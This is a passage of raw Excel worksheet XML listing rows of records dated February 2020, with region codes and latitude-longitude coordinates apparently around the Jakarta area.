      </c>
      <c r="H1429" t="s">
        <v>26</v>
      </c>
      <c r="I1429" t="s">
        <v>2300</v>
      </c>
      <c r="J1429" t="s">
        <v>2268</v>
      </c>
      <c r="L1429" t="s">
        <v>4982</v>
      </c>
      <c r="M1429">
        <v>3175030002</v>
      </c>
      <c r="N1429">
        <v>3175030</v>
      </c>
      <c r="O1429">
        <v>3175</v>
      </c>
      <c r="P1429">
        <v>31</v>
      </c>
      <c r="Q1429" t="s">
        <v>1592</v>
      </c>
      <c r="R1429" t="s">
        <v>1563</v>
      </c>
      <c r="S1429" t="s">
        <v>547</v>
      </c>
      <c r="T1429" t="s">
        <v>33</v>
      </c>
      <c r="U1429" s="5">
        <v>10686178</v>
      </c>
      <c r="V1429" s="5" t="s">
        <v>15737</v>
      </c>
      <c r="W1429" s="5">
        <v>-615413</v>
      </c>
      <c r="X1429" t="s">
        <v>19509</v>
      </c>
      <c r="Y1429" t="str">
        <f t="shared" si="22"/>
        <v>-6.15413,106.86178</v>
      </c>
    </row>
    <row r="1430" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1430">
        <v>108953</v>
      </c>
      <c r="B1430" s="1">
        <v>43886</v>
      </c>
      <c r="C1430">
        <v>0</v>
      </c>
      <c r="D1430" t="s">
        <v>22</v>
      </c>
      <c r="E1430" t="s">
        <v>23</v>
      </c>
      <c r="F1430" t="s">
        <v>4983</v>
      </c>
      <c r="G1430" t="s">
        <v>4984</v>
      </c>
      <c r="H1430" t="s">
        <v>26</v>
      </c>
      <c r="I1430" t="s">
        <v>1991</v>
      </c>
      <c r="J1430" t="s">
        <v>4414</v>
      </c>
      <c r="M1430">
        <v>3173070002</v>
      </c>
      <c r="N1430">
        <v>3173070</v>
      </c>
      <c r="O1430">
        <v>3173</v>
      </c>
      <c r="P1430">
        <v>31</v>
      </c>
      <c r="Q1430" t="s">
        <v>2710</v>
      </c>
      <c r="R1430" t="s">
        <v>323</v>
      </c>
      <c r="S1430" t="s">
        <v>62</v>
      </c>
      <c r="T1430" t="s">
        <v>33</v>
      </c>
      <c r="U1430" s="5">
        <v>10684069</v>
      </c>
      <c r="V1430" s="5" t="s">
        <v>15738</v>
      </c>
      <c r="W1430" s="5">
        <v>-614812</v>
      </c>
      <c r="X1430" t="s">
        <v>19510</v>
      </c>
      <c r="Y1430" t="str">
        <f t="shared" si="22"/>
        <v>-6.14812,106.84069</v>
      </c>
    </row>
    <row r="1431" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1431">
        <v>108954</v>
      </c>
      <c r="B1431" s="1">
        <v>43886</v>
      </c>
      <c r="C1431">
        <v>0</v>
      </c>
      <c r="D1431" t="s">
        <v>22</v>
      </c>
      <c r="E1431" t="s">
        <v>23</v>
      </c>
      <c r="F1431" t="s">
        <v>4985</v>
      </c>
      <c r="H1431" t="s">
        <v>26</v>
      </c>
      <c r="I1431" t="s">
        <v>1909</v>
      </c>
      <c r="J1431" t="s">
        <v>4986</v>
      </c>
      <c r="L1431" t="s">
        <v>4987</v>
      </c>
      <c r="M1431">
        <v>3174070004</v>
      </c>
      <c r="N1431">
        <v>3174070</v>
      </c>
      <c r="O1431">
        <v>3174</v>
      </c>
      <c r="P1431">
        <v>31</v>
      </c>
      <c r="Q1431" t="s">
        <v>926</v>
      </c>
      <c r="R1431" t="s">
        <v>84</v>
      </c>
      <c r="S1431" t="s">
        <v>32</v>
      </c>
      <c r="T1431" t="s">
        <v>33</v>
      </c>
      <c r="U1431" s="5">
        <v>10676612</v>
      </c>
      <c r="V1431" s="5" t="s">
        <v>15739</v>
      </c>
      <c r="W1431" s="5">
        <v>-614145</v>
      </c>
      <c r="X1431" t="s">
        <v>19444</v>
      </c>
      <c r="Y1431" t="str">
        <f t="shared" si="22"/>
        <v>-6.14145,106.76612</v>
      </c>
    </row>
    <row r="1432" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1432">
        <v>108956</v>
      </c>
      <c r="B1432" s="1">
        <v>43886</v>
      </c>
      <c r="C1432">
        <v>0</v>
      </c>
      <c r="D1432" t="s">
        <v>22</v>
      </c>
      <c r="E1432" t="s">
        <v>23</v>
      </c>
      <c r="F1432" t="s">
        <v>4988</v>
      </c>
      <c r="G1432" t="s">
        <v>4989</v>
      </c>
      <c r="H1432" t="s">
        <v>26</v>
      </c>
      <c r="I1432" t="s">
        <v>2962</v>
      </c>
      <c r="J1432" t="s">
        <v>2627</v>
      </c>
      <c r="L1432" t="s">
        <v>4990</v>
      </c>
      <c r="M1432">
        <v>3275060005</v>
      </c>
      <c r="N1432">
        <v>3275060</v>
      </c>
      <c r="O1432">
        <v>3275</v>
      </c>
      <c r="P1432">
        <v>32</v>
      </c>
      <c r="Q1432" t="s">
        <v>3526</v>
      </c>
      <c r="R1432" t="s">
        <v>114</v>
      </c>
      <c r="S1432" t="s">
        <v>41</v>
      </c>
      <c r="T1432" t="s">
        <v>42</v>
      </c>
      <c r="U1432" s="5">
        <v>10697409</v>
      </c>
      <c r="V1432" s="5" t="s">
        <v>15740</v>
      </c>
      <c r="W1432" s="5">
        <v>-621440</v>
      </c>
      <c r="X1432" t="s">
        <v>19511</v>
      </c>
      <c r="Y1432" t="str">
        <f t="shared" si="22"/>
        <v>-6.21440,106.97409</v>
      </c>
    </row>
    <row r="1433" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1433">
        <v>108957</v>
      </c>
      <c r="B1433" s="1">
        <v>43886</v>
      </c>
      <c r="C1433">
        <v>0</v>
      </c>
      <c r="D1433" t="s">
        <v>22</v>
      </c>
      <c r="E1433" t="s">
        <v>23</v>
      </c>
      <c r="F1433" t="s">
        <v>4991</v>
      </c>
      <c r="G1433" t="s">
        <v>4992</v>
      </c>
      <c r="H1433" t="s">
        <v>26</v>
      </c>
      <c r="I1433" t="s">
        <v>4993</v>
      </c>
      <c r="J1433" t="s">
        <v>4994</v>
      </c>
      <c r="L1433" t="s">
        <v>4995</v>
      </c>
      <c r="M1433">
        <v>3171080003</v>
      </c>
      <c r="N1433">
        <v>3171080</v>
      </c>
      <c r="O1433">
        <v>3171</v>
      </c>
      <c r="P1433">
        <v>31</v>
      </c>
      <c r="Q1433" t="s">
        <v>3677</v>
      </c>
      <c r="R1433" t="s">
        <v>1403</v>
      </c>
      <c r="S1433" t="s">
        <v>108</v>
      </c>
      <c r="T1433" t="s">
        <v>33</v>
      </c>
      <c r="U1433" s="5">
        <v>10682445</v>
      </c>
      <c r="V1433" s="5" t="s">
        <v>15741</v>
      </c>
      <c r="W1433" s="5">
        <v>-625418</v>
      </c>
      <c r="X1433" t="s">
        <v>19512</v>
      </c>
      <c r="Y1433" t="str">
        <f t="shared" si="22"/>
        <v>-6.25418,106.82445</v>
      </c>
    </row>
    <row r="1434" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1434">
        <v>108958</v>
      </c>
      <c r="B1434" s="1">
        <v>43886</v>
      </c>
      <c r="C1434">
        <v>0</v>
      </c>
      <c r="D1434" t="s">
        <v>22</v>
      </c>
      <c r="E1434" t="s">
        <v>23</v>
      </c>
      <c r="F1434" t="s">
        <v>4996</v>
      </c>
      <c r="G1434" t="s">
        <v>4997</v>
      </c>
      <c r="H1434" t="s">
        <v>26</v>
      </c>
      <c r="I1434" t="s">
        <v>1504</v>
      </c>
      <c r="J1434" t="s">
        <v>4998</v>
      </c>
      <c r="L1434" t="s">
        <v>4999</v>
      </c>
      <c r="M1434">
        <v>3171060003</v>
      </c>
      <c r="N1434">
        <v>3171060</v>
      </c>
      <c r="O1434">
        <v>3171</v>
      </c>
      <c r="P1434">
        <v>31</v>
      </c>
      <c r="Q1434" t="s">
        <v>5000</v>
      </c>
      <c r="R1434" t="s">
        <v>1236</v>
      </c>
      <c r="S1434" t="s">
        <v>108</v>
      </c>
      <c r="T1434" t="s">
        <v>33</v>
      </c>
      <c r="U1434" s="5">
        <v>10681010</v>
      </c>
      <c r="V1434" s="5" t="s">
        <v>15742</v>
      </c>
      <c r="W1434" s="5">
        <v>-625073</v>
      </c>
      <c r="X1434" t="s">
        <v>19513</v>
      </c>
      <c r="Y1434" t="str">
        <f t="shared" si="22"/>
        <v>-6.25073,106.81010</v>
      </c>
    </row>
    <row r="1435" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1435">
        <v>108959</v>
      </c>
      <c r="B1435" s="1">
        <v>43886</v>
      </c>
      <c r="C1435">
        <v>0</v>
      </c>
      <c r="D1435" t="s">
        <v>22</v>
      </c>
      <c r="E1435" t="s">
        <v>23</v>
      </c>
      <c r="F1435" t="s">
        <v>5001</v>
      </c>
      <c r="G1435" t="s">
        <v>5002</v>
      </c>
      <c r="H1435" t="s">
        <v>26</v>
      </c>
      <c r="I1435" t="s">
        <v>452</v>
      </c>
      <c r="J1435" t="s">
        <v>2627</v>
      </c>
      <c r="M1435">
        <v>3275060002</v>
      </c>
      <c r="N1435">
        <v>3275060</v>
      </c>
      <c r="O1435">
        <v>3275</v>
      </c>
      <c r="P1435">
        <v>32</v>
      </c>
      <c r="Q1435" t="s">
        <v>113</v>
      </c>
      <c r="R1435" t="s">
        <v>114</v>
      </c>
      <c r="S1435" t="s">
        <v>41</v>
      </c>
      <c r="T1435" t="s">
        <v>42</v>
      </c>
      <c r="U1435" s="5">
        <v>10694859</v>
      </c>
      <c r="V1435" s="5" t="s">
        <v>15743</v>
      </c>
      <c r="W1435" s="5">
        <v>-623125</v>
      </c>
      <c r="X1435" t="s">
        <v>19514</v>
      </c>
      <c r="Y1435" t="str">
        <f t="shared" si="22"/>
        <v>-6.23125,106.94859</v>
      </c>
    </row>
    <row r="1436" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1436">
        <v>108960</v>
      </c>
      <c r="B1436" s="1">
        <v>43886</v>
      </c>
      <c r="C1436">
        <v>0</v>
      </c>
      <c r="D1436" t="s">
        <v>22</v>
      </c>
      <c r="E1436" t="s">
        <v>23</v>
      </c>
      <c r="F1436" t="s">
        <v>5003</v>
      </c>
      <c r="G1436" t="s">
        <v>5004</v>
      </c>
      <c r="H1436" t="s">
        <v>26</v>
      </c>
      <c r="I1436" t="s">
        <v>1490</v>
      </c>
      <c r="J1436" t="s">
        <v>118</v>
      </c>
      <c r="L1436" t="s">
        <v>5005</v>
      </c>
      <c r="M1436">
        <v>3171070001</v>
      </c>
      <c r="N1436">
        <v>3171070</v>
      </c>
      <c r="O1436">
        <v>3171</v>
      </c>
      <c r="P1436">
        <v>31</v>
      </c>
      <c r="Q1436" t="s">
        <v>120</v>
      </c>
      <c r="R1436" t="s">
        <v>121</v>
      </c>
      <c r="S1436" t="s">
        <v>108</v>
      </c>
      <c r="T1436" t="s">
        <v>33</v>
      </c>
      <c r="U1436" s="5">
        <v>10680888</v>
      </c>
      <c r="V1436" s="5" t="s">
        <v>15744</v>
      </c>
      <c r="W1436" s="5">
        <v>-625538</v>
      </c>
      <c r="X1436" t="s">
        <v>19515</v>
      </c>
      <c r="Y1436" t="str">
        <f t="shared" si="22"/>
        <v>-6.25538,106.80888</v>
      </c>
    </row>
    <row r="1437" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1437">
        <v>108961</v>
      </c>
      <c r="B1437" s="1">
        <v>43886</v>
      </c>
      <c r="C1437">
        <v>0</v>
      </c>
      <c r="D1437" t="s">
        <v>22</v>
      </c>
      <c r="E1437" t="s">
        <v>23</v>
      </c>
      <c r="F1437" t="s">
        <v>5006</v>
      </c>
      <c r="G1437" t="s">
        <v>5007</v>
      </c>
      <c r="H1437" t="s">
        <v>26</v>
      </c>
      <c r="I1437" t="s">
        <v>27</v>
      </c>
      <c r="J1437" t="s">
        <v>2845</v>
      </c>
      <c r="L1437" t="s">
        <v>5008</v>
      </c>
      <c r="M1437">
        <v>3172070003</v>
      </c>
      <c r="N1437">
        <v>3172070</v>
      </c>
      <c r="O1437">
        <v>3172</v>
      </c>
      <c r="P1437">
        <v>31</v>
      </c>
      <c r="Q1437" t="s">
        <v>2659</v>
      </c>
      <c r="R1437" t="s">
        <v>128</v>
      </c>
      <c r="S1437" t="s">
        <v>49</v>
      </c>
      <c r="T1437" t="s">
        <v>33</v>
      </c>
      <c r="U1437" s="5">
        <v>10693118</v>
      </c>
      <c r="V1437" s="5" t="s">
        <v>15745</v>
      </c>
      <c r="W1437" s="5">
        <v>-623284</v>
      </c>
      <c r="X1437" t="s">
        <v>19516</v>
      </c>
      <c r="Y1437" t="str">
        <f t="shared" si="22"/>
        <v>-6.23284,106.93118</v>
      </c>
    </row>
    <row r="1438" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1438">
        <v>108962</v>
      </c>
      <c r="B1438" s="1">
        <v>43886</v>
      </c>
      <c r="C1438">
        <v>0</v>
      </c>
      <c r="D1438" t="s">
        <v>22</v>
      </c>
      <c r="E1438" t="s">
        <v>23</v>
      </c>
      <c r="F1438" t="s">
        <v>5009</v>
      </c>
      <c r="G1438" t="s">
        <v>5010</v>
      </c>
      <c r="H1438" t="s">
        <v>26</v>
      </c>
      <c r="I1438" t="s">
        <v>2165</v>
      </c>
      <c r="J1438" t="s">
        <v>2627</v>
      </c>
      <c r="L1438" t="s">
        <v>5011</v>
      </c>
      <c r="M1438">
        <v>3275050002</v>
      </c>
      <c r="N1438">
        <v>3275050</v>
      </c>
      <c r="O1438">
        <v>3275</v>
      </c>
      <c r="P1438">
        <v>32</v>
      </c>
      <c r="Q1438" t="s">
        <v>2245</v>
      </c>
      <c r="R1438" t="s">
        <v>955</v>
      </c>
      <c r="S1438" t="s">
        <v>41</v>
      </c>
      <c r="T1438" t="s">
        <v>42</v>
      </c>
      <c r="U1438" s="5">
        <v>10697097</v>
      </c>
      <c r="V1438" s="5" t="s">
        <v>15746</v>
      </c>
      <c r="W1438" s="5">
        <v>-626680</v>
      </c>
      <c r="X1438" t="s">
        <v>19517</v>
      </c>
      <c r="Y1438" t="str">
        <f t="shared" si="22"/>
        <v>-6.26680,106.97097</v>
      </c>
    </row>
    <row r="1439" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1439">
        <v>108963</v>
      </c>
      <c r="B1439" s="1">
        <v>43886</v>
      </c>
      <c r="C1439">
        <v>0</v>
      </c>
      <c r="D1439" t="s">
        <v>22</v>
      </c>
      <c r="E1439" t="s">
        <v>23</v>
      </c>
      <c r="F1439" t="s">
        <v>5012</v>
      </c>
      <c r="G1439" t="s">
        <v>5013</v>
      </c>
      <c r="H1439" t="s">
        <v>26</v>
      </c>
      <c r="I1439" t="s">
        <v>1909</v>
      </c>
      <c r="J1439" t="s">
        <v>2627</v>
      </c>
      <c r="L1439" t="s">
        <v>5014</v>
      </c>
      <c r="M1439">
        <v>3275012004</v>
      </c>
      <c r="N1439">
        <v>3275012</v>
      </c>
      <c r="O1439">
        <v>3275</v>
      </c>
      <c r="P1439">
        <v>32</v>
      </c>
      <c r="Q1439" t="s">
        <v>4941</v>
      </c>
      <c r="R1439" t="s">
        <v>4089</v>
      </c>
      <c r="S1439" t="s">
        <v>41</v>
      </c>
      <c r="T1439" t="s">
        <v>42</v>
      </c>
      <c r="U1439" s="5">
        <v>10693044</v>
      </c>
      <c r="V1439" s="5" t="s">
        <v>15747</v>
      </c>
      <c r="W1439" s="5">
        <v>-629923</v>
      </c>
      <c r="X1439" t="s">
        <v>19518</v>
      </c>
      <c r="Y1439" t="str">
        <f t="shared" si="22"/>
        <v>-6.29923,106.93044</v>
      </c>
    </row>
    <row r="1440" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1440">
        <v>108964</v>
      </c>
      <c r="B1440" s="1">
        <v>43886</v>
      </c>
      <c r="C1440">
        <v>0</v>
      </c>
      <c r="D1440" t="s">
        <v>22</v>
      </c>
      <c r="E1440" t="s">
        <v>23</v>
      </c>
      <c r="F1440" t="s">
        <v>5015</v>
      </c>
      <c r="G1440" t="s">
        <v>5016</v>
      </c>
      <c r="H1440" t="s">
        <v>26</v>
      </c>
      <c r="I1440" t="s">
        <v>1194</v>
      </c>
      <c r="J1440" t="s">
        <v>3045</v>
      </c>
      <c r="L1440" t="s">
        <v>5017</v>
      </c>
      <c r="M1440">
        <v>3175060002</v>
      </c>
      <c r="N1440">
        <v>3175060</v>
      </c>
      <c r="O1440">
        <v>3175</v>
      </c>
      <c r="P1440">
        <v>31</v>
      </c>
      <c r="Q1440" t="s">
        <v>2674</v>
      </c>
      <c r="R1440" t="s">
        <v>2279</v>
      </c>
      <c r="S1440" t="s">
        <v>547</v>
      </c>
      <c r="T1440" t="s">
        <v>33</v>
      </c>
      <c r="U1440" s="5">
        <v>10694057</v>
      </c>
      <c r="V1440" s="5" t="s">
        <v>15748</v>
      </c>
      <c r="W1440" s="5">
        <v>-614028</v>
      </c>
      <c r="X1440" t="s">
        <v>19519</v>
      </c>
      <c r="Y1440" t="str">
        <f t="shared" si="22"/>
        <v>-6.14028,106.94057</v>
      </c>
    </row>
    <row r="1441" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1441">
        <v>108965</v>
      </c>
      <c r="B1441" s="1">
        <v>43886</v>
      </c>
      <c r="C1441">
        <v>0</v>
      </c>
      <c r="D1441" t="s">
        <v>22</v>
      </c>
      <c r="E1441" t="s">
        <v>23</v>
      </c>
      <c r="F1441" t="s">
        <v>5018</v>
      </c>
      <c r="H1441" t="s">
        <v>26</v>
      </c>
      <c r="I1441" t="s">
        <v>1201</v>
      </c>
      <c r="J1441" t="s">
        <v>2627</v>
      </c>
      <c r="L1441" t="s">
        <v>5019</v>
      </c>
      <c r="M1441">
        <v>3275061004</v>
      </c>
      <c r="N1441">
        <v>3275061</v>
      </c>
      <c r="O1441">
        <v>3275</v>
      </c>
      <c r="P1441">
        <v>32</v>
      </c>
      <c r="Q1441" t="s">
        <v>39</v>
      </c>
      <c r="R1441" t="s">
        <v>40</v>
      </c>
      <c r="S1441" t="s">
        <v>41</v>
      </c>
      <c r="T1441" t="s">
        <v>42</v>
      </c>
      <c r="U1441" s="5">
        <v>10698831</v>
      </c>
      <c r="V1441" s="5" t="s">
        <v>15749</v>
      </c>
      <c r="W1441" s="5">
        <v>-618281</v>
      </c>
      <c r="X1441" t="s">
        <v>19520</v>
      </c>
      <c r="Y1441" t="str">
        <f t="shared" si="22"/>
        <v>-6.18281,106.98831</v>
      </c>
    </row>
    <row r="1442" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1442">
        <v>108966</v>
      </c>
      <c r="B1442" s="1">
        <v>43886</v>
      </c>
      <c r="C1442">
        <v>0</v>
      </c>
      <c r="D1442" t="s">
        <v>22</v>
      </c>
      <c r="E1442" t="s">
        <v>23</v>
      </c>
      <c r="F1442" t="s">
        <v>5020</v>
      </c>
      <c r="G1442" t="s">
        <v>5021</v>
      </c>
      <c r="H1442" t="s">
        <v>26</v>
      </c>
      <c r="I1442" t="s">
        <v>5022</v>
      </c>
      <c r="J1442" t="s">
        <v>2627</v>
      </c>
      <c r="L1442" t="s">
        <v>5023</v>
      </c>
      <c r="M1442">
        <v>3275070002</v>
      </c>
      <c r="N1442">
        <v>3275070</v>
      </c>
      <c r="O1442">
        <v>3275</v>
      </c>
      <c r="P1442">
        <v>32</v>
      </c>
      <c r="Q1442" t="s">
        <v>3309</v>
      </c>
      <c r="R1442" t="s">
        <v>3310</v>
      </c>
      <c r="S1442" t="s">
        <v>41</v>
      </c>
      <c r="T1442" t="s">
        <v>42</v>
      </c>
      <c r="U1442" s="5">
        <v>10700795</v>
      </c>
      <c r="V1442" s="5" t="s">
        <v>15750</v>
      </c>
      <c r="W1442" s="5">
        <v>-617564</v>
      </c>
      <c r="X1442" t="s">
        <v>19521</v>
      </c>
      <c r="Y1442" t="str">
        <f t="shared" si="22"/>
        <v>-6.17564,107.00795</v>
      </c>
    </row>
    <row r="1443" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1443">
        <v>108967</v>
      </c>
      <c r="B1443" s="1">
        <v>43886</v>
      </c>
      <c r="C1443">
        <v>0</v>
      </c>
      <c r="D1443" t="s">
        <v>22</v>
      </c>
      <c r="E1443" t="s">
        <v>23</v>
      </c>
      <c r="F1443" t="s">
        <v>5024</v>
      </c>
      <c r="G1443" t="s">
        <v>5025</v>
      </c>
      <c r="H1443" t="s">
        <v>26</v>
      </c>
      <c r="I1443" t="s">
        <v>181</v>
      </c>
      <c r="J1443" t="s">
        <v>5026</v>
      </c>
      <c r="L1443" t="s">
        <v>2373</v>
      </c>
      <c r="M1443">
        <v>3171060004</v>
      </c>
      <c r="N1443">
        <v>3171060</v>
      </c>
      <c r="O1443">
        <v>3171</v>
      </c>
      <c r="P1443">
        <v>31</v>
      </c>
      <c r="Q1443" t="s">
        <v>5027</v>
      </c>
      <c r="R1443" t="s">
        <v>1236</v>
      </c>
      <c r="S1443" t="s">
        <v>108</v>
      </c>
      <c r="T1443" t="s">
        <v>33</v>
      </c>
      <c r="U1443" s="5">
        <v>10681008</v>
      </c>
      <c r="V1443" s="5" t="s">
        <v>15751</v>
      </c>
      <c r="W1443" s="5">
        <v>-624775</v>
      </c>
      <c r="X1443" t="s">
        <v>19522</v>
      </c>
      <c r="Y1443" t="str">
        <f t="shared" si="22"/>
        <v>-6.24775,106.81008</v>
      </c>
    </row>
    <row r="1444" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1444">
        <v>108968</v>
      </c>
      <c r="B1444" s="1">
        <v>43886</v>
      </c>
      <c r="C1444">
        <v>0</v>
      </c>
      <c r="D1444" t="s">
        <v>22</v>
      </c>
      <c r="E1444" t="s">
        <v>23</v>
      </c>
      <c r="F1444" t="s">
        <v>5028</v>
      </c>
      <c r="G1444" t="s">
        <v>5029</v>
      </c>
      <c r="H1444" t="s">
        <v>26</v>
      </c>
      <c r="I1444" t="s">
        <v>3731</v>
      </c>
      <c r="J1444" t="s">
        <v>5030</v>
      </c>
      <c r="L1444" t="s">
        <v>5031</v>
      </c>
      <c r="M1444">
        <v>3172030004</v>
      </c>
      <c r="N1444">
        <v>3172030</v>
      </c>
      <c r="O1444">
        <v>3172</v>
      </c>
      <c r="P1444">
        <v>31</v>
      </c>
      <c r="Q1444" t="s">
        <v>228</v>
      </c>
      <c r="R1444" t="s">
        <v>228</v>
      </c>
      <c r="S1444" t="s">
        <v>49</v>
      </c>
      <c r="T1444" t="s">
        <v>33</v>
      </c>
      <c r="U1444" s="5">
        <v>10689427</v>
      </c>
      <c r="V1444" s="5" t="s">
        <v>15752</v>
      </c>
      <c r="W1444" s="5">
        <v>-632701</v>
      </c>
      <c r="X1444" t="s">
        <v>19523</v>
      </c>
      <c r="Y1444" t="str">
        <f t="shared" si="22"/>
        <v>-6.32701,106.89427</v>
      </c>
    </row>
    <row r="1445" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1445">
        <v>108969</v>
      </c>
      <c r="B1445" s="1">
        <v>43886</v>
      </c>
      <c r="C1445">
        <v>0</v>
      </c>
      <c r="D1445" t="s">
        <v>22</v>
      </c>
      <c r="E1445" t="s">
        <v>23</v>
      </c>
      <c r="F1445" t="s">
        <v>5032</v>
      </c>
      <c r="G1445" t="s">
        <v>5033</v>
      </c>
      <c r="H1445" t="s">
        <v>26</v>
      </c>
      <c r="I1445" t="s">
        <v>5034</v>
      </c>
      <c r="J1445" t="s">
        <v>1879</v>
      </c>
      <c r="L1445" t="s">
        <v>5035</v>
      </c>
      <c r="M1445">
        <v>3173080003</v>
      </c>
      <c r="N1445">
        <v>3173080</v>
      </c>
      <c r="O1445">
        <v>3173</v>
      </c>
      <c r="P1445">
        <v>31</v>
      </c>
      <c r="Q1445" t="s">
        <v>157</v>
      </c>
      <c r="R1445" t="s">
        <v>157</v>
      </c>
      <c r="S1445" t="s">
        <v>62</v>
      </c>
      <c r="T1445" t="s">
        <v>33</v>
      </c>
      <c r="U1445" s="5">
        <v>10682274</v>
      </c>
      <c r="V1445" s="5" t="s">
        <v>15753</v>
      </c>
      <c r="W1445" s="5">
        <v>-617532</v>
      </c>
      <c r="X1445" t="s">
        <v>19016</v>
      </c>
      <c r="Y1445" t="str">
        <f t="shared" si="22"/>
        <v>-6.17532,106.82274</v>
      </c>
    </row>
    <row r="1446" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1446">
        <v>108970</v>
      </c>
      <c r="B1446" s="1">
        <v>43886</v>
      </c>
      <c r="C1446">
        <v>0</v>
      </c>
      <c r="D1446" t="s">
        <v>22</v>
      </c>
      <c r="E1446" t="s">
        <v>23</v>
      </c>
      <c r="F1446" t="s">
        <v>5036</v>
      </c>
      <c r="G1446" t="s">
        <v>5037</v>
      </c>
      <c r="H1446" t="s">
        <v>26</v>
      </c>
      <c r="I1446" t="s">
        <v>2962</v>
      </c>
      <c r="J1446" t="s">
        <v>2627</v>
      </c>
      <c r="L1446" t="s">
        <v>5038</v>
      </c>
      <c r="M1446">
        <v>3275050002</v>
      </c>
      <c r="N1446">
        <v>3275050</v>
      </c>
      <c r="O1446">
        <v>3275</v>
      </c>
      <c r="P1446">
        <v>32</v>
      </c>
      <c r="Q1446" t="s">
        <v>2245</v>
      </c>
      <c r="R1446" t="s">
        <v>955</v>
      </c>
      <c r="S1446" t="s">
        <v>41</v>
      </c>
      <c r="T1446" t="s">
        <v>42</v>
      </c>
      <c r="U1446" s="5">
        <v>10697215</v>
      </c>
      <c r="V1446" s="5" t="s">
        <v>15754</v>
      </c>
      <c r="W1446" s="5">
        <v>-626693</v>
      </c>
      <c r="X1446" t="s">
        <v>19524</v>
      </c>
      <c r="Y1446" t="str">
        <f t="shared" si="22"/>
        <v>-6.26693,106.97215</v>
      </c>
    </row>
    <row r="1447" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1447">
        <v>108971</v>
      </c>
      <c r="B1447" s="1">
        <v>43886</v>
      </c>
      <c r="C1447">
        <v>0</v>
      </c>
      <c r="D1447" t="s">
        <v>22</v>
      </c>
      <c r="E1447" t="s">
        <v>23</v>
      </c>
      <c r="F1447" t="s">
        <v>5039</v>
      </c>
      <c r="G1447" t="s">
        <v>5040</v>
      </c>
      <c r="H1447" t="s">
        <v>26</v>
      </c>
      <c r="I1447" t="s">
        <v>2005</v>
      </c>
      <c r="J1447" t="s">
        <v>3135</v>
      </c>
      <c r="L1447" t="s">
        <v>5041</v>
      </c>
      <c r="M1447">
        <v>3671010002</v>
      </c>
      <c r="N1447">
        <v>3671010</v>
      </c>
      <c r="O1447">
        <v>3671</v>
      </c>
      <c r="P1447">
        <v>36</v>
      </c>
      <c r="Q1447" t="s">
        <v>199</v>
      </c>
      <c r="R1447" t="s">
        <v>200</v>
      </c>
      <c r="S1447" t="s">
        <v>201</v>
      </c>
      <c r="T1447" t="s">
        <v>171</v>
      </c>
      <c r="U1447" s="5">
        <v>10670092</v>
      </c>
      <c r="V1447" s="5" t="s">
        <v>15755</v>
      </c>
      <c r="W1447" s="5">
        <v>-624353</v>
      </c>
      <c r="X1447" t="s">
        <v>19525</v>
      </c>
      <c r="Y1447" t="str">
        <f t="shared" si="22"/>
        <v>-6.24353,106.70092</v>
      </c>
    </row>
    <row r="1448" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1448">
        <v>108972</v>
      </c>
      <c r="B1448" s="1">
        <v>43886</v>
      </c>
      <c r="C1448">
        <v>0</v>
      </c>
      <c r="D1448" t="s">
        <v>85</v>
      </c>
      <c r="E1448" t="s">
        <v>23</v>
      </c>
      <c r="F1448" t="s">
        <v>5042</v>
      </c>
      <c r="G1448" t="s">
        <v>5043</v>
      </c>
      <c r="H1448" t="s">
        <v>26</v>
      </c>
      <c r="J1448" t="s">
        <v>2627</v>
      </c>
      <c r="K1448" t="s">
        <v>5044</v>
      </c>
      <c r="L1448" t="s">
        <v>5045</v>
      </c>
      <c r="M1448">
        <v>3275060001</v>
      </c>
      <c r="N1448">
        <v>3275060</v>
      </c>
      <c r="O1448">
        <v>3275</v>
      </c>
      <c r="P1448">
        <v>32</v>
      </c>
      <c r="Q1448" t="s">
        <v>611</v>
      </c>
      <c r="R1448" t="s">
        <v>114</v>
      </c>
      <c r="S1448" t="s">
        <v>41</v>
      </c>
      <c r="T1448" t="s">
        <v>42</v>
      </c>
      <c r="U1448" s="5">
        <v>10694592</v>
      </c>
      <c r="V1448" s="5" t="s">
        <v>15756</v>
      </c>
      <c r="W1448" s="5">
        <v>-624932</v>
      </c>
      <c r="X1448" t="s">
        <v>19526</v>
      </c>
      <c r="Y1448" t="str">
        <f t="shared" si="22"/>
        <v>-6.24932,106.94592</v>
      </c>
    </row>
    <row r="1449" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1449">
        <v>108973</v>
      </c>
      <c r="B1449" s="1">
        <v>43886</v>
      </c>
      <c r="C1449">
        <v>0</v>
      </c>
      <c r="D1449" t="s">
        <v>22</v>
      </c>
      <c r="E1449" t="s">
        <v>23</v>
      </c>
      <c r="F1449" t="s">
        <v>5046</v>
      </c>
      <c r="G1449" t="s">
        <v>5047</v>
      </c>
      <c r="H1449" t="s">
        <v>26</v>
      </c>
      <c r="I1449" t="s">
        <v>166</v>
      </c>
      <c r="J1449" t="s">
        <v>3066</v>
      </c>
      <c r="L1449" t="s">
        <v>5048</v>
      </c>
      <c r="M1449">
        <v>3173020001</v>
      </c>
      <c r="N1449">
        <v>3173020</v>
      </c>
      <c r="O1449">
        <v>3173</v>
      </c>
      <c r="P1449">
        <v>31</v>
      </c>
      <c r="Q1449" t="s">
        <v>179</v>
      </c>
      <c r="R1449" t="s">
        <v>179</v>
      </c>
      <c r="S1449" t="s">
        <v>62</v>
      </c>
      <c r="T1449" t="s">
        <v>33</v>
      </c>
      <c r="U1449" s="5">
        <v>10683380</v>
      </c>
      <c r="V1449" s="5" t="s">
        <v>15158</v>
      </c>
      <c r="W1449" s="5">
        <v>-619926</v>
      </c>
      <c r="X1449" t="s">
